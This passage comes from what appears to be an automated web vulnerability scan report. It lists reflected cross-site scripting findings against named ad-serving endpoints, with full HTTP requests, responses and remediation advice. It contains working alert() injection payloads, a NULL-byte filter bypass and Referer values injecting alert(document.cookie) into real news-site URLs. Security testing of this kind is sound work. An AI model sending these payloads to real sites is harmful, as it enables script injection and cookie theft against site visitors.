Cookie: FC1-WC=^54144_2_2hYC9; C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cr=405|2|-8589049292256662518|1; 513102_300X250_50151=1/28/2011 12:37:49 PM; V=gFEcJzqCjXJj; vf=1; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cw=cw;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: -891921703
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:41:02 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151\";var cf="300X250";var ca="VIEWAD7085a;alert(1)//2098f28910d";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else
...[SNIP]...

4.738. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0018ba5"%3balert(1)//19729ceb402 was submitted in the action parameter. This input was echoed as 18ba5";alert(1)//19729ceb402 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD%0018ba5"%3balert(1)//19729ceb402&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB29
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 77862555
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4888
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:30 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250";var ca="VIEWAD.18ba5";alert(1)//19729ceb402";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else
...[SNIP]...

4.739. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cb7"%3balert(1)//7377cbd05b7 was submitted in the cwadformat parameter. This input was echoed as c3cb7";alert(1)//7377cbd05b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250c3cb7"%3balert(1)//7377cbd05b7&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB31
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 1946838018
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:31 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250c3cb7";alert(1)//7377cbd05b7";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var
...[SNIP]...

4.740. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce0e3"%3balert(1)//eaee3633345 was submitted in the cwheight parameter. This input was echoed as ce0e3";alert(1)//eaee3633345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250ce0e3"%3balert(1)//eaee3633345&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB21
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 1942438807
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:36 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250ce0e3";alert(1)//eaee3633345";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else var cwfl=_cww.cwfl;if(typeof(cwif)==_cw
...[SNIP]...

4.741. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3768c"%3balert(1)//bab2d4aa7b was submitted in the cwpid parameter. This input was echoed as 3768c";alert(1)//bab2d4aa7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=5131023768c"%3balert(1)//bab2d4aa7b&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB31
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: -1380734480
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4886
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:32 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="5131023768c";alert(1)//bab2d4aa7b";var ct="50151";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl"
...[SNIP]...

4.742. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e45c"%3balert(1)//19ca24f69bd was submitted in the cwpnet parameter. This input was echoed as 7e45c";alert(1)//19ca24f69bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=17e45c"%3balert(1)//19ca24f69bd&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: -516785157
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:36 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="17e45c";alert(1)//19ca24f69bd";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else var cwfl=_cww.cwfl;if(typeof(cwif)==_cwu)var cwif=
...[SNIP]...

4.743. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1edbc"%3balert(1)//e4a6c8ea835 was submitted in the cwrun parameter. This input was echoed as 1edbc";alert(1)//e4a6c8ea835 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=2001edbc"%3balert(1)//e4a6c8ea835&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 400078144
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:31 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250";var ca="VIEWAD";var cr="2001edbc";alert(1)//e4a6c8ea835";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else var cwfl=_cww
...[SNIP]...

4.744. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a3b"%3balert(1)//bb32770019f was submitted in the cwtagid parameter. This input was echoed as c1a3b";alert(1)//bb32770019f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151c1a3b"%3balert(1)//bb32770019f HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB28
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 767372036
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151c1a3b";alert(1)//bb32770019f";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww
...[SNIP]...

4.745. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2db2f"%3balert(1)//aecfa14c61f was submitted in the cwwidth parameter. This input was echoed as 2db2f";alert(1)//aecfa14c61f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=3002db2f"%3balert(1)//aecfa14c61f&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 1713931250
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:35 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="3002db2f";alert(1)//aecfa14c61f";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else var cwfl=_cww.cwfl;if(type
...[SNIP]...

4.746. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/NYDailyNewscom/ROS/tags.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5152<a>ba673f094d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/NYDailyNewscomc5152<a>ba673f094d9/ROS/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:02:01 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:02:01 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
